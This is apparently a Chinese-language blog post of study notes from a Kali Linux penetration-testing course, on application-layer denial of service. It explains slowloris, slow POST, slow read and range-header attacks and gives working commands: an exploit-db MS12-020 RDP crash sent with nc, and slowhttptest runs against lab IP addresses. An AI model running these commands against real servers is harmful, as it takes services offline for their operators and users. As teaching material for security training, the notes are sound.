Kali Linux渗透测试 132 拒绝服务--应用层DoS 攻击
本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的《Kali Linux 渗透测试》课程Kali Linux渗透测试(苑房弘)博客记录1. 简介应用服务漏洞服务代码存在漏洞,遇异常提交数据时程序崩溃应用处理大量并发请求能力有限,被拒绝的是应用或OS缓冲区溢出漏洞向目标函数随机提交数据,特定情况下数据覆盖临近寄存器或内存影响: 远程代
·
本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的《Kali Linux 渗透测试》课程
1. 简介
应用服务漏洞
- 服务代码存在漏洞,遇异常提交数据时程序崩溃
- 应用处理大量并发请求能力有限,被拒绝的是应用或OS
缓冲区溢出漏洞
- 向目标函数随机提交数据,特定情况下数据覆盖临近寄存器或内存
- 影响: 远程代码执行、DOS
- 利用模糊测试方法发现缓冲区溢出漏洞
CesarFTP 0.99 服务漏洞
- ftp_fuzz.py # MKD/RMD
MS12-020 远程桌面协议DOS漏洞
2. 攻击测试 MS12-020
root@kali:~# searchsploit ms12-020
root@kali:~# cp /usr/share/exploitdb/exploits/windows/dos/18606.txt .
root@kali:~# mv 18606.txt MS12-020.txt
root@kali:~# leafpad MS12-020.txt
root@kali:~# nc 10.10.10.141 3389 < termdd_1.dat
3. Slowhttptest
Slowhttptest (源自google)
- 低带宽应用层慢速DOS攻击(相对于CC等快速攻击而言的慢速)
- 最早由Python编写,跨平台支持(Linux、win、Cygwin、OSX)
- 尤其擅长攻击apache.tomcat (几乎百发百中)
攻击方法
- Slowloris、Slow HTTP POST 攻击
- 耗尽应用的并发连接池,类似于Http层的Syn flood
- HTTP协议默认在服务器全部接收请求之后才开始处理,若客户端发送速度缓慢或不完整 服务器时钟为其保留连接资源池占用,此类大量并发将导致DOS
- Slowloris: 完整的http请求结尾是rnirn, 攻击发……
- Slow POST: HTTP头content-length声明长度,但body部分缓慢发送
- Slowloris、Slow HTTP POST 攻击
攻击方法
- Slow Read attack攻击
- 与slowloris and slow POST目的相同,都是耗尽应用的并发连接池
- 不同之处在于请求正常发送,但慢速读取响应数据
- 攻击者调整TCPwindow窗口大小,是服务器慢速返回数据
攻击方法
- Apache Range Header attack
- 客户端传输大文件时,体积查过HTTP Body大小限制时进行分段
- 耗尽服务器CPU、内存资源
- Apache Range Header attack
ulimite -n 70000
HTTP Post 攻击模式
- slowhttptest -c 1000 -B -g -o body_stats -i 110 -r 200 -s 8192 -t FAKEVERB -u http://10.10.10.132 -x 10 -p 3
slowloris 攻击模式
- slowhttptest -c 1000 -H -g -o header_stats -i 10 -r 200 -t GET -u http://10.10.10.132 -x 24 -p 3
支持代理
大量应用服务器和安全设备都无法防护慢速攻击
4. 攻击测试
root@kali:~# slowhttptest -c 60000 -B -g -o body_stats -i 110 -r 200 -s 8192 -t FAKEVERB -u http://10.10.10.132 -x 10 -p 3 -l 999999
root@kali:~# slowhttptest -c 1000 -H -g -o my_header_stats -i 10 -r 200 -s 8192 -t GET -u http://10.10.10.132 -x 10 -p 3
root@kali:~# man slowhttptest
更多推荐
已为社区贡献11条内容
所有评论(0)